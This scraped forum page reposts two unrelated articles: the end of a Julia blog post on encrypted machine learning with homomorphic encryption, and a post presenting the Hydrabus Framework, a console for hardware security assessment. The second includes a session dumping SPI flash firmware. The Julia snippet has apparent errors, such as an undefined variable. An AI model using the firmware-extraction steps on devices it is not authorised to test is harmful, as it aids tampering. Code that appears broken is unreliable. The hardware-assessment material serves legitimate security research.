ExplodedConvArray{eltype(batch)}(cdims, batch); julia> model(a) 10×64 Array{Float32,2}: [snip] How do we bring this into the encrypted world? Well, we need to do two things: We want to encrypt a struct (ExplodedConvArray) in such a way that each that we get a ciphertext for each field. Then, operations on this encrypted struct work by looking up what the function would have done on the original struct and simply doing the same homomorphically. We want to intercept certain operations to be done differently in the encrypted context. Luckily, Julia, provides an abstraction that lets us a do both: A compiler plugin-in using the Cassette.jl mechanism. How this works and how to use it is a bit of a complicated story, so I will omit it from this blog, post, but briefly, you can define a Context (say Encrypted and then define rules for how operations under this context work). 
For example, the second requirement might be written as:

# Define matrix multiplication between an array and an encrypted block array
function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{<:BlockArray{T, 2}}) where {T}
    sum(a*b for (i,range) in enumerate(partition(1:size(a, 2), size(b.blocks[1], 1))))
end

# Define matrix multiplication between an array and an encrypted array
function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{Array{T, 2}}) where {T}
    result = repeat(diag(a), inner=size(a, 1)).*x
    rotated = b
    for k = 2:size(a, 2)
        rotated = ToyFHE.rotate(GaloisKey(*), rotated)
        result += repeat(diag(circshift(a, (0,(k-1)))), inner=size(a, 1)) .* rotated
    end
    result
end

The end result of all of this is that the user should be able to write the whole thing above with minimal manual work:

kp = keygen(ckks_params)
ek = keygen(EvalMultKey, kp.priv)
gk = keygen(GaloisKey, kp.priv; steps=64)

# Create evaluation context
ctx = Encrypted(ek, gk)

# Do public preprocessing
batch = ExplodedConvArray{eltype(batch)}(cdims, batch);

# Run on encrypted data under the encryption context
Cresult = ctx(model)(encrypt(kp.pub, batch))

# Decrypt the answer
decrypt(kp, Cresult)

Of course, even that may not be optimal. The parameters of the cryptosystem (e.g. the ring ℛ, when to modswitch, keyswitch, etc.) represent a tradeoff between precision of the answer, security and performance, and depend strongly on the code being run. In general, one would want the compiler to analyze the code it's about to run encrypted, suggest parameters for a given security level and desired precision, and then generate the code with minimal manual work by the user.
Conclusion
Achieving the dream of automatically executing arbitrary computations securely is a tall order for any system, but Julia's metaprogramming capabilities and friendly syntax make it well suited as a development platform. Some attempts at this have already been made by the RAMPARTS collaboration (paper, JuliaCon talk), which compiles simple Julia code to the PALISADE FHE library. Julia Computing is collaborating with the experts behind RAMPARTS on Verona, the recently announced next-generation version of that system. Only in the past year or so has the performance of homomorphic encryption systems reached the point where it is possible to actually evaluate interesting computations at speeds approaching practical usability. The floodgates are open. With new advances in algorithms, software and hardware, homomorphic encryption is sure to become a mainstream technology to protect the privacy of millions of users. If you would like to understand more deeply how everything works, I have tried to make sure that the ToyFHE repository is readable. There is also some documentation that I'm hoping gives a somewhat approachable introduction to the cryptography involved. Of course much work remains to be done. If you are interested in this kind of work or have interesting applications, do not hesitate to get in touch.
Sursa: https://juliacomputing.com/blog/2019/11/22/encrypted-machine-learning.html
  24. Hydrabus Framework Hardware tool security tools hardware ghecko Oct 20 Hi Guys, before diving into the main subject: I'm a security engineer and I'm fascinated by hardware security assessment. Since I started playing with hardware tools like the Bus Pirate and Hydrabus, I have noticed that no tool brings together all the necessary scripts to interact with hardware protocols. Who hasn't been frustrated during a hardware security assessment when facing an exposed chip or debug port without the necessary script to dump it, find the baudrate of a UART port or properly communicate with it? That's why I chose to develop a new framework for the awesome hardware tool Hydrabus, named [Hydrabus-Framework](https://github.com/hydrabus-framework/framework). It provides multiple modules allowing you to work efficiently and save time on any hardware project. This framework works like Metasploit: simply run hbfconsole, select a module using the use command, set the needed options with set and run it with the run command! It will also include a Miniterm to interact directly with the Hydrabus CLI. At the time of this writing, 3 modules are available.
Modules
hbfmodules.uart.baudrates
This module allows you to detect the baudrate of a UART target. It changes the UART baudrate automatically until it finds the correct value. If it finds a valid baudrate, it prompts you to open a Miniterm session using the Hydrabus binary UART bridge.
hbfmodules.spi.chip_id
The SPI chip_id module allows you to recover the ID of an SPI flash chip, which is useful to verify that the Hydrabus is correctly interfaced with the target or to identify the family of an unknown chip. It will be improved in the near future to print the manufacturer and chip name if found (like flashrom).
hbfmodules.spi.dump_eeprom
SPI dump_eeprom is used to dump an SPI flash. With this module, you can easily dump a flash memory without wasting your time writing a script to do it, and jump straight to analyzing the freshly dumped firmware!
More modules are coming soon! You can download the latest modules and update the framework by simply running the hbfupdate script.
Architecture
This framework has been developed with scalability in mind. Indeed, you can add modules without having to modify the framework's core engine. Each module inherits from the abstract class AModule, providing a solid foundation to start coding your own module (a minimal sketch of this pattern is included at the end of this post). Once the module is created and installed using python setup.py install, you can use it in the framework.
Contributing
To create a new module, open an issue on hbfmodules.skeleton; I will create a new repository initialized with the hbfmodules.skeleton repository once you have provided the needed information. You can find more information about contributing to this project in the CONTRIBUTING.md file.
Use case: Dumping an SPI flash chip

ghecko % hbfconsole
[ASCII-art 'HYDRABUS FRAMEWORK' banner]
[*] 3 modules loaded, run 'hbfupdate' command to install the latest modules
[hbf] > use spi/dump_eeprom
[hbf] spi(dump_eeprom)> show options

Author: Jordan Ovrè
Module name: dump SPI EEPROM, version 0.0.2
Description: Module to dump SPI EEPROM

Name          Value         Required   Description
------------  ------------  ---------  --------------------------------------------------------------------------
hydrabus      /dev/ttyACM0  True       Hydrabus device
timeout       1             True       Hydrabus read timeout
dumpfile                    True       The dump filename
sectors       1024          True       The number of sector (4096) to read. For example 1024 sector * 4096 = 4MiB
start_sector  0             True       The starting sector (1 sector = 4096 bytes)
spi_device    1             True       The hydrabus SPI device (1=SPI1 or 0=SPI2)
spi_speed     slow          True       set SPI speed (fast = 10.5MHz, slow = 320kHz, medium = 5MHz)
spi_polarity  0             True       set SPI polarity (1=high or 0=low)
spi_phase     0             True       set SPI phase (1=high or 0=low)

[hbf] spi(dump_eeprom)> set dumpfile firmware.bin
dumpfile ==> firmware.bin
[hbf] spi(dump_eeprom)> set spi_speed medium
spi_speed ==> medium
[hbf] spi(dump_eeprom)> run
[*] Starting to read chip...
Reading 1024 sectors
Dump 4.0MiB
Readed: 4.0MiB
[✔] Finished dumping to firmware.bin
[*] Reset hydrabus to console mode
[hbf] spi(dump_eeprom)> binwalk firmware.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
134816        0x20EA0         Certificate in DER format (x509 v3), header length: 4, sequence length: 64
150864        0x24D50         U-Boot version string, "U-Boot 1.1.4 (Nov 26 2012 - 15:58:42)"
151232        0x24EC0         CRC32 polynomial table, big endian
160905        0x27489         Copyright string: "copyright."
262208        0x40040         LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 2465316 bytes
1114112       0x110000        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2676149 bytes, 1117 inodes, blocksize: 131072 bytes, created: 2013-11-12 09:49:10
3801091       0x3A0003        POSIX tar archive (GNU), owner user name: "_table.tar.gz"

You can find the tools and more details on the official github repository: hydrabus-framework
Ghecko.
Sursa: https://0x00sec.org/t/hydrabus-framework/17057
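As promised above, here is a minimal sketch of the kind of module pattern the post describes: an abstract base class with declared options and a run() method. This is illustrative Python written from the post's description only; it is not the actual hydrabus-framework API, and the class, method and option names here are invented.

from abc import ABC, abstractmethod

class BaseModule(ABC):
    """Hypothetical stand-in for the framework's abstract module class."""
    name = "base"
    options = {}   # option name -> {"value": ..., "required": bool, "description": str}

    def set(self, key, value):
        self.options[key]["value"] = value

    def check_options(self):
        missing = [k for k, o in self.options.items() if o["required"] and o["value"] is None]
        if missing:
            raise ValueError(f"missing required options: {missing}")

    @abstractmethod
    def run(self):
        ...

class DumpEeprom(BaseModule):
    name = "spi/dump_eeprom"
    options = {
        "dumpfile": {"value": None, "required": True, "description": "The dump filename"},
        "sectors":  {"value": 1024, "required": True, "description": "Number of 4096-byte sectors to read"},
    }

    def run(self):
        self.check_options()
        # A real module would drive the Hydrabus here; this sketch just prints.
        print(f"[*] dumping {self.options['sectors']['value']} sectors to {self.options['dumpfile']['value']}")

# Roughly what `use spi/dump_eeprom`, `set dumpfile firmware.bin`, `run` map to:
mod = DumpEeprom()
mod.set("dumpfile", "firmware.bin")
mod.run()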